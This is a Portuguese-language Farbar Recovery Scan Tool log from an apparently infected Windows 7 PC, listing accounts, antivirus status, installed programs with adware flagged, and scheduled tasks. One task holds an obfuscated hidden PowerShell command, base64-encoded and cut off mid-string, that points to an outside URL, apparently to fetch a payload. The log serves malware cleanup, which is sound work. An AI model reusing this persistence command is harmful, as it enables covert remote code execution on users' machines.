Publicité
Publicité
Format du document : text/plain
Prévisualisation
Resultado do exame Adicional Farbar Recovery Scan Tool (x86) Versão:18-01-2016
Executado por vivo (2016-01-19 13:04:22)
Executando a partir de C:\Users\vivo\Downloads
Microsoft Windows 7 Professional Service Pack 1 (X86) (2013-07-30 17:00:57)
Modo da Inicialização: Normal
==========================================================
==================== Contas: =============================
Administrador (S-1-5-21-2498198735-273976222-1782081069-500 - Administrator - Disabled)
Convidado (S-1-5-21-2498198735-273976222-1782081069-501 - Limited - Enabled)
vivo (S-1-5-21-2498198735-273976222-1782081069-1001 - Administrator - Enabled) => C:\Users\vivo
==================== Central de Segurança ========================
(Se uma entrada for incluída na fixlist, será removida.)
AV: avast! Antivirus (Enabled - Out of date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Out of date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
==================== Programas Instalados ======================
(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)
Adobe Flash Player 20 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 20.0.0.267 - Adobe Systems Incorporated)
Adobe Reader X (10.1.0) - Português (HKLM\...\{AC76BA86-7AD7-1046-7B44-AA1000000001}) (Version: 10.1.0 - Adobe Systems Incorporated)
Advanced Calendar 2.0.0.11153 (HKLM\...\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}) (Version: 2.0.0.11153 - MEIXIAN XIE) <==== ATENÇÃO
Advanced-System Protector (HKLM\...\00212D92-C5D8-4ff4-AE50-B20F0F85C40A_Systweak_Ad~9338DF9D_is1) (Version: 2.2.1000.19019 - Advanced System Protector) <==== ATENÇÃO
Atualização do produto Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0416-0000-0000000FF1CE}_ENTERPRISE_{717C9095-8AAE-41CB-B046-BD6E8399F4F3}) (Version: - Microsoft)
Atualização do produto Microsoft Office Outlook 2007 Help (KB963677) (HKLM\...\{90120000-001A-0416-0000-0000000FF1CE}_ENTERPRISE_{5016CB22-B9A7-44FB-AA72-AF28B27B15EA}) (Version: - Microsoft)
Atualização do produto Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0416-0000-0000000FF1CE}_ENTERPRISE_{BE3A7C0C-0081-4694-B5F9-980DD66BDDF8}) (Version: - Microsoft)
Atualização do produto Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0416-0000-0000000FF1CE}_ENTERPRISE_{7297E3A9-FCD4-4E0E-A306-7A90359E50E3}) (Version: - Microsoft)
aTube Catcher versão 3.8 (HKLM\...\{D43B360E-722D-421B-BC77-20B9E0F8B6CD}_is1) (Version: 3.8 - DsNET Corp)
Avast Free Antivirus (HKLM\...\avast) (Version: 10.3.2218 - AVAST Software)
CCleaner (HKLM\...\CCleaner) (Version: 5.11 - Piriform)
CertiInstaller 1.0.1.1 (HKLM\...\{4E637561-3FE5-4464-A2C1-8E0C44940601}_is1) (Version: 1.0.1.1 - Certisign)
CertiPlugin 1.0.0.3 (HKU\S-1-5-21-2498198735-273976222-1782081069-1001\...\{E74B2E92-1570-41FB-AB75-1A618DD3FCE3}_is1) (Version: 1.0.0.3 - Certisign)
Corel Graphics - Windows Shell Extension (HKLM\...\_{B865FDD4-E96E-4166-BB69-6E8C207E3E29}) (Version: 17.0.0.491 - Corel Corporation)
Corel Graphics - Windows Shell Extension (Version: 17.0.491 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - BR (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Capture (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Common (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Connect (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Custom Data (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Draw (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Filters (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - FontNav (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - IPM Content (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - IPM T (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - PHOTO-PAINT (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Photozoom Plugin (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Redist (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Setup Files (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - VBA (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - VideoBrowser (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 - Writing Tools (Version: 17.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite X7 (HKLM\...\_{C5D9CECB-A66F-473F-B406-5C8C2DCA4DF0}) (Version: 17.0.0.491 - Corel Corporation)
CorelDRAW Graphics Suite X7 (Version: 17.0 - Corel Corporation) Hidden
Counter-Strike 1.6 (HKLM\...\{13B792AA-C078-43A4-8A3A-8B12D629940D}) (Version: 1.00.0000 - )
Driver 1.2 (HKLM\...\{BA56CD60-1D9F-4BE6-AC2F-B7C4A5437C35}) (Version: 1.2 - OEM)
DriverScanner (HKLM\...\{C2F8CA82-2BD9-4513-B2D1-08A47914C1DA}_is1) (Version: 4.0.16.0 - Uniblue Systems Ltd)
GamesDesktop 020.004010210 (HKLM\...\gmsd_br_004010210_is1) (Version: - GAMESDESKTOP) <==== ATENÇÃO
Google Update Helper (Version: 1.3.25.11 - Google Inc.) Hidden
hppLaserJetService (Version: 001.003.000145 - Hewlett-Packard) Hidden
hppM1130M1210SeriesLaserJetService (Version: 001.003.00073 - Hewlett-Packard) Hidden
hppusgM1130M1210Series (Version: 1.0.0.2 - Hewlett-Packard) Hidden
Intel(R) Control Center (HKLM\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.0.1014 - Intel Corporation)
JMicron Ethernet Adapter NDIS Driver (HKLM\...\{96DCEE2F-98EE-4F80-8C0F-7C04D1FB9D7F}) (Version: 6.0.17.1 - JMicron Technology Corp.)
JMicron Flash Media Controller Driver (HKLM\...\{26604C7E-A313-4D12-867F-7C6E7820BE4C}) (Version: 1.0.45.0 - JMicron Technology Corp.)
MarketResearch (Version: 130.0.374.000 - Hewlett-Packard) Hidden
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (Português do Brasil) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1046) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2.0 - ENU (HKLM\...\{AA4A4B2C-0465-3CF8-BA76-27A027D8ACAB}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2.0 Runtime (HKLM\...\{299C0434-4F4E-341F-A916-4E07AEB35E79}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2012 (HKLM\...\{89ca2a32-2b52-4595-8dfd-6fe4757958d0}) (Version: 11.0.51108 - Microsoft Corporation)
Mozilla Firefox 43.0.4 (x86 pt-BR) (HKLM\...\Mozilla Firefox 43.0.4 (x86 pt-BR)) (Version: 43.0.4 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 43.0.4.5848 - Mozilla)
MyPC Backup (HKLM\...\OLBPre) (Version: - MyPC Backup) <==== ATENÇÃO
MyStart Toolbar (HKLM\...\mystarttb) (Version: 5.6.0.6 - Visicom Media Inc.)
OMNIKEY 3x21 PC/SC Driver (HKLM\...\{4DDEADA8-25B8-41CB-9989-8F16D50A8E9C}) (Version: 3.0.0.0 - OMNIKEY)
Pacote de Idiomas do Microsoft Visual Studio Tools for Applications 2012 x86 Hosting Support - PTB (Version: 11.0.51108 - Microsoft Corporation) Hidden
PDF24 Creator 7.4.1 (HKLM\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version: - PDF24.org)
REALTEK Wireless LAN Driver (HKLM\...\{9D3D8C60-A55F-4fed-B2B9-173F09590E16}) (Version: 1.00.0148 - REALTEK Semiconductor Corp.)
SafeSign (HKLM\...\{2DF407D3-A8AD-4ACF-BFD5-5F7D42EC62FD}) (Version: 3.0.87 - A.E.T. Europe B.V.)
Setup (HKLM\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version: - ) <==== ATENÇÃO
Spyware Terminator 2015 (HKLM\...\{56736259-613E-4A3B-B428-6235F2E76F44}_is1) (Version: 3.0.1.107 - Crawler Group)
System Healer (HKLM\...\SystemHealer) (Version: 4.1.0.0 - SystemHealer)
TrueSizer Wilcom e3.0 (HKLM\...\{E801DDB4-3CFC-496E-9E04-781EC2445D82}) (Version: 17.0.107.7371 - Wilcom)
TTWiFi 1.0.0.1 (HKLM\...\ttwifi) (Version: 1.0.0.1 - )
Unity Web Player (HKU\S-1-5-21-2498198735-273976222-1782081069-1001\...\UnityWebPlayer) (Version: 5.2.3f1 - Unity Technologies ApS)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Wajam (HKLM\...\WajaNetEn) (Version: 1.58.1.37 (i1.0) - Wajam) <==== ATENÇÃO
Web Shield (HKLM\...\WebShield) (Version: 2.7.78 - Irrational Number Applications) <==== ATENÇÃO
Wilcom TrueSizer e3.0 (Version: 17.0.107.7371 - Wilcom) Hidden
WinRAR 5.30 (32-bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)
Языковой пакет для поддержки размещения набора средств Microsoft Visual Studio Tools для работы с приложениями 2012 (x86) - RUS (Version: 11.0.51108 - Microsoft Corporation) Hidden
==================== Exame Personalizado CLSID (Whitelisted): ==========================
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
CustomCLSID: HKU\S-1-5-21-2498198735-273976222-1782081069-1001_Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\InprocServer32 -> C:\Users\vivo\AppData\LocalLow\Unity\WebPlayer\loader\UnityWebPluginAX.ocx (Unity Technologies ApS)
==================== Tarefas Agendadas (Whitelisted) =============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
Task: {04E6C6B9-5E64-4A3B-B053-A08A2D5EBD72} - \WinKit -> Nenhum Arquivo <==== ATENÇÃO
Task: {25E80772-FA16-4575-BEB3-42B9236D5592} - System32\Tasks\System Healer Task => C:\Program Files\SystemHealer\RescueMonitor.exe [2015-12-29] ()
Task: {29CB1D60-6F16-4D52-BB2B-596ACC99C71B} - System32\Tasks\Experience Extension => Rundll32.exe "C:\Users\vivo\AppData\Local\Experience Extension\xBin\ExperienceExtension.dll",#3 <==== ATENÇÃO
Task: {2E002453-331D-4898-B0C7-05A5C199C6C7} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2015-12-16] (AVAST Software)
Task: {30B64B17-EA3C-42B7-A9F3-F3112E2BDE4A} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2015-06-30] (Avast Software s.r.o.)
Task: {31CE59EC-7FDA-43D3-B01B-981AB366ADDF} - System32\Tasks\System HealerStartUp => C:\Program Files\SystemHealer\SystemHealer.exe [2015-12-29] ()
Task: {31DDA842-77F3-453C-816D-710DA4A92BD1} - System32\Tasks\{BB405779-E6B9-4228-9601-C192C595A761} => C:\Program Files\Wilcom\ES2006\BIN\DESLOADR.EXE
Task: {4542C0FF-B4C3-400B-BD23-F85EC4B9B686} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2015-12-28] (Adobe Systems Incorporated)
Task: {4CF7494B-C02D-4B22-A11F-05E78F9D4EC3} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-10-19] (Piriform Ltd)
Task: {56F537F9-68FF-4711-8381-EC2A77AA799F} - \SwiftSearch Auto Updater 1.10.0.25 Core -> Nenhum Arquivo <==== ATENÇÃO
Task: {5B7D2B83-9863-42A0-AB66-FDF48E8B1084} - System32\Tasks\{04C6D611-6CC6-425B-98D9-3A498E722217} => pcalua.exe -a D:\Setup\Setup.exe -d D:\Setup
Task: {6AEF0C98-2CB4-4B67-8C70-4C977C7355CC} - System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask => start sppsvc
Task: {72F9DAB4-57C9-4CEC-982D-F4A4121EF7F8} - System32\Tasks\osTip => C:\ProgramData\WindowsMsg\osmsg.exe [2016-01-16] ()
Task: {8111ABC3-1BEB-44C4-ABB9-25529BFBAE76} - \SmartWeb Upgrade Trigger Task -> Nenhum Arquivo <==== ATENÇÃO
Task: {83628CDD-CBE6-4A1B-8C5A-4FBBEBBE1A18} - \SwiftSearch Auto Updater 1.10.0.25 Pending Update -> Nenhum Arquivo <==== ATENÇÃO
Task: {8AE93B02-9EDC-45A1-8849-C79BF48AB0B6} - System32\Tasks\Inst_Rep => C:\Users\vivo\AppData\Local\Installer\Install_31302\ytdieamodc_amodc_inst.exe [2016-01-17] () <==== ATENÇÃO
Task: {AF97FBFD-0279-4CD7-A26F-74BA11ED883B} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {B22FA0E4-543B-47C0-8F7E-DE1714B40022} - System32\Tasks\Ancropafe => C:\ProgramData\Ancropafe\1.0.7.1\erwrolnu.exe [2016-01-17] ()
Task: {D0475699-763C-4711-A7DD-C7117465C2F3} - System32\Tasks\Advanced System~Protector => C:\Program Files\ASP\AspManager.exe [2015-11-20] ()
Task: {D622195C-D680-4FEA-9C56-59660C7C9E94} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {DBBD752C-9E61-4D20-9FAF-1766105CDFCA} - System32\Tasks\{ECC2E1FB-24B4-443B-BA80-46A62A0FFBD9} => C:\Program Files\Wilcom\ES2006\BIN\DESLOADR.EXE
Task: {E1CED1B4-5B07-4D72-99E8-D5C3C7576202} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-13] (Adobe Systems Incorporated)
Task: {EA31FDFA-F4C6-49E5-8CC6-E0D8038C0080} - \Run_Bobby_Browser -> Nenhum Arquivo <==== ATENÇÃO
Task: {EC86346F-26A7-47E1-93D6-96D55F27DDF7} - System32\Tasks\{06FC4789-9338-4776-931B-1D12976D8FC0} => \CEBOLA_NET\Users\Public\programa\Wilcom 2006 SP4 Windows Seven\SP4_r2\WilcomES_SP4_r2.exe
Task: {ED595085-8E54-489D-A36C-ED8914801C59} - System32\Tasks\{0F7D0B47-7D0D-7A0C-0511-0D0C090E1108} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAZQBjAHUAcgBlAGIALgBpAG4AZgBvAC8AdQAvAD8AYQA9AHQARAB6AE0ALQBCADEAMwBmAGsAdQAwAFkAYwBUAHkAYQB4AFMAeQBQAEcAeABzAHMAWQBzAGIAaABUAEYASABzAFYAMgBiAE0AWgBGAHEAdQBHAFYAOQBYAFIAUQBtAF8AZAAzAFkAcwBHAEYAVAA3AFMAYwBIAGUAQgBXAFoALQBDAEgAMQBEAGsAdQBhAGQAVgBfAFMAQwBZAHQANwAyAFgAVAAxAEQAdAAyAFYAZABHAEEAMgA4AFMAeAA0AHkANwBOAFMARgBRADMARAB0AHAASgBrAFQAbgA5AEkARwBoAEwAZwBHAGEAagA4AHgAUgBVADMAVgA2AHMAZgBwAHoAMABHAFgAVwBFAGMAawBDADIAMwB3ADMANgBKAHQAagBoADYAVgA5AFQAVABFAFEATABCAGkAZwBDAGgAVABJADgASgBjAHQAQwBIAE4AOQBoAEcAegBKAGMAcwBSAEUAcQBWAFgAdgB6AGwAcgB0AGsASAAyADEAagBFAGYAdgB2AEIAegBCAHEAeQBkAEsANAByAFEAcgBPADkATgBIAFgASwAtAHEAdgBNAGwAZgBLAHQAZwBzAHIAVwBQAGIAUABpAEYAMwBrAEQAagBYAEoANQBuAE4AbQBWAG0AUwBUAHQAbgBrAG4AeQA0AFgAOQBZAFAALQA4ADMARgBaAEIAWABMADgAdwBmAHQAZABuAHoANABLAEgATwBqADYAVQBNAEEASgBCADMAMABaAHAANwBhAE8AOQBlADcAUQBWAEsAegBTAGcAegBVAEEAYgBHAHUAMgBhAGEASAB6AHEAZwBkAGQANABaAEMAUgB0AFkAbwBSAFcAMwBqAGcANwBCAFgANQBrAGQALQBIAFkAYgBFAGcARABnADgAcABBADcAWgBpAFUAcwBWAGQAbQBCAEkAZABTADMATwB0AEUAWABGAFYAQgA0AGcALQBEAEsARwB2AHQAcAAzAEQAbQBVAEQARABsADQAVgBDAFAAegBOAFYAZABoAFYANQB3AGMAdAA3AE8AdQBlADAAVQBDADEAbAB5ADYAZgBVAFUAdQBGADgAMgBOAHQAQwA1AE8ARgBUAHcAegBLAHEAVABSAEEAegBHAEsAagBKAFIARABxAG0ALQA3AEYANQBUAFYAMgAtADkAZABiAGkAYwBKADQALQA0AFAARwBGAFQATQBIAHkASQBNAHIAbwAyAG0AcQBkAGUAVABsAEkAeABBAEUARgBiADIATwA4AFQATABwAEwAUwBvAFkAZABvAFUAZgBiADAASgBYAFkANwBTAEEAeQBmAGwAUABqADgAYQAtAFQAeQBTAFMARQA1AGgARABPAGwAXwBUAGMAMgBIAG4AcgBNAEgAMwBQAEIAdABoAGcAeQAyAEYAcwBzAE4AMQBxAFMASQBrAG4ARgByAEoATgB3AE0AegBKAC0AUQBlADkAYwBPAHEAcABjAGEATQBUAEIATgB5AEQASQBWAGwAdwBLAE0AbQBlAHQAbgBhAFgAbAB4AHEAbgBQAG0AeABNADMANwBGADgAYQBKAHUATgA0AFcASABPAEUAVQBhAFgAcABMAE4AQwBGAFYATABhAEIARgBSAHIAYgBaAHgAWQBFAHkAbwB0AHcAcgBNAEsAMABaAG0AQQBpADkAZwBWAHIAdwBGAGUATwBNAEQAQgBJADYAQwBRAGEANgB5ADkARgBWAHYAYgA3AHgAUwBHAFEANgBSAEUAVABMAEQAUQBGAGcASwB6AHAAcwBoAGUAcwBaAFgANwAyAEUAbwBoADUAbABrAG8AZwBEAC0AWgBnAEwAYwBCAFoAdQBQAEYAdgB5AGwAZgBnAHoANwBxAHQARQA2AEoASwBxAEUASwBYADkANABhAGUANQBkADgAOQBXAFkAZwBsAFgAawBxAEYASAB5AHIAUAB5AEMAQQB6AGoATQBhAEcANwBwAFQANABvAEQAdwB6AEsAcwBZAFEAcwBsAHcARQBzAHMAbgBYAHIAZwBoAHoAawBSAG8AZQB0AHAAcABOAEQAeAB2AEsAeAA5ADIAZQBpADEANQB4AFgATwBtAEgAMQBzADcAVABXAEgAQgBwAHMAZQA3AFcAZQA4AGEAWABJADQAXwBuAGUANABIAHIAOQA5ADUATAAwADYAegBxADAAdAA3ADYAQQBTAHUAWQBFAEUAcgBDAEsAaQBsAE0AWQBkAEQAdgBzADYAWgB3AHYANwBCAEcAVQBFAF8AdABaADUAdQBNAG0AUQB1AFkASgBzADQAbQA0AEIAWQB2AG8AdwBkAFgANQA3AGUASwBMAFIAXwBYAHIAYwBPADYANABQAGcAMQBtAEIARQBLAHAAXwBvAEgAJgBjAD0ATgAzAHMAZgAzAHgAawBxAHoANwBaAG4AbgBCAHMARAA4AGcAQgBqAGcATwBmAGwAMAA3AFMAXwBjADkANgBOAGQANQA4AHAAQwBWAGkAMABmAHIAMgBzAGcASwBYAEQAXwBlAEMAUQBfAFEAdABOADgAcABpAHAAUwBEAFgAWQBzAEwAZQBqAEIAdQBhAHkAbwBTAEwAVAB1AEgASgBrAFYAbQBEAGYAYgBtAEoAMwBHAHEAagAwAFUATwBsAFgAbQBpAEoAaABlAEoAZQBqAGwAaQBJAFEARwBtAGkAMgBKAFgAbwBxAFoAdABJAHkATAAtAFYAVwBJAHgAMgBOAFkALQBLAGkAZgBtAHUAcAA4ADAAMwBfAEcAMwB1AGoANAB1AEQAUQA0AGMAYwAxAFkASQB1AEoAdgB1AGoAdwBOAE0AbgAxAHAARwA4AGIAQgA0AC0AMQBXAEUAVwA1AHcASQAyAF8ANQBsAGcANABaAHQAZwBRAFUAMwBSAGgAdwBpAEwASwBrAGcAYgBEAGoAMgBxAEIAVQB6AEsAcABNADAAUQBWADkAZQBVADkARQBkAHgATQBfAHoAaAA1AHcANQBzAGEAbwBFAGkAZgBjAG8AMABLAFEAcAA3AE4AdABmAGsASQBXAFgAQQA1AGcAZABjADMAVwBxAF8AQQBkAGcAWgBEAHYAZgBqAHkAMQBsAHEAOABZAEQAOQByAFUAbwBaAHYAeABnADIASAB3AE0ARwA1AC0AdAByAEgAQgA4AE4AcgBjADkAYwBPAHAATQBpAFcAZwBHAHoAVQBpAFIAZQA5AGcAQgBOAHoAcgBTAEwAbQA1AEEANABnAFEAcAA3AEgAUgBYAEYALQB5AGMAVQB6AC0AOABIADMARQB6AGsAdwBOAEMAbQBIAFUAMwBpAGwAaABHAEgAMwBTAEEAUAB6AEEAVABoAHcATgBBADAARQBpAHkAdQA0AGcAWQBIADYAVwBXADUARwBYAGoAUQBPAHoAZAAtAG8AWAB5AEUAQwBDAFEAYQAwAHUAcQAwAEcAZQBZAFQAdgAwAEIAbwBUAFUAdQBQAEkAXwBpAFEAZwBCAHIAaAAwADgASwAtAC0ARwBxADUAbgA3AGYAVgBWAGYAdABrAC0AbQBMADAAYgBFAE8AaABBADYANgBBADAAWgByAHkAUQB5AHkAcgBrAHAANgBfAEsAMABPAG0AbABLADYAbwB0AGUAMAB1AGwAdgBnAEYALQAtAG8AMwBQAC0AOABJAEQAeABPAGUAagA3AEkAdwBmAF8AUwBJAFoASQBjADIAegBBAE4AQgBvAEYAMQB3ADYAVAA4AGkARgBSAEcARgB5AEgAUwBhAFUAdAAwADEAcQB1AE4AcQB4AFcASQBTAF8ATABfAGoAdAA4AEcAawBWAEwAdQBuAGgAbgB3AGMAVwA4AEIAaQA5AG0AdgBIAFIAQwBjAFoAegBhAHQATgAzAEUAOQB5ADEAWQBvAGsASgBFAGIAdABPAEoAMQAyAGMAawB1AGsAVgA0ADEASwA1ADcAVwBTAE0AaQBCAHUAQgBVAFUAYgBqAFMAbABVADgAMABYADMAZQBQAEwAZQB6AGQATwAtAEwAUwByAFoAVABaAHcAZwB5ADQANwBuAFgAeQBmADMAUgB1ADYAQwBwAGUAMQBfAGwAZQBTAGsAXwAxAEYALQBYAGIARgBhAE8ARAAxAGUAcgBzADkAQQBHAHYAawAxAHIAZwBBAE0ATQBzAFgAcABwAHoAcQBTAFgAeQBSADUAagBQADIATgBTAGwAWQBzAEoATABiADkAagBoAF8ATQBCAGUAWgBJAGcAZABIAEUAcABWAFQAYQA1AEYARABjAHYAcQBzAGYAawA3AEsAMwBwAEsAeQBpADgAQwBXAEgAbwBBAFAANAAxAHIATQB4AHkAVwAwAEMAZQBhAFEASAAzAC0AeQBtAEcASQBQAEsAMAB2AHcAawBPADAASwBFAGMAYQByAHIATwBKAFcATgBoAEMAVAAwAFkAVQAzAE8AWgBjAEkAQwBKAG0AVABBAG4AWgBoAFEALQBZAG0ATABVAHMAQwBSAEwAZgBpADIAcQBtAE0AZgBjADkAMQBoAEIASgBJADQAMABaAFIAQwBnAGQASABZAEYAawBsAG8AVABuAGMAMwBhAE0AeABKAFUAZwBkAFIAQwBFAE0ASgBmAE8ASABHADYASgBBAEkATQBCAHoAbABsADYAYQAtAGQAcwA4ADIAUABWADcAVQB3AG0ARgBGAEwAbQAyAHAAMQBrAEwASwBiADQAZwA1AEsAcwBBAE0ARQBYADMASwBWAGIAcgBjAHQAUgAyAHgAUwByAGUAZABPADMAWQAyAEQAVwB3AEIARwBZAE0AdwA4AHUANgBuADUAbwB2ADMAUQAtADgATAAmAHIAPQA1ADIANgAxADkANwA2ADAAOAAyADYANAA4ADkANgA2ADYAIgA7ACQAcwB0AHMAawA9ACIAewAwAEYANwBEADAAQgA0ADcALQA3AEQAMABEAC0ANwBBADAAQwAtADAANQAxADEALQAwAEQAMABDADAAOQAwAEUAMQAxADAAOAB9ACIAOwAkAHAAcgBpAGQAPQAiAFMAeQBzAHQAZQBtAEgAZQBhAGwAZQByACIAOwAkAGkAbgBpAGQAPQAiAFUAVABKAFUAWQBUAFUATQAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwB9ACQAdgA9AFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBT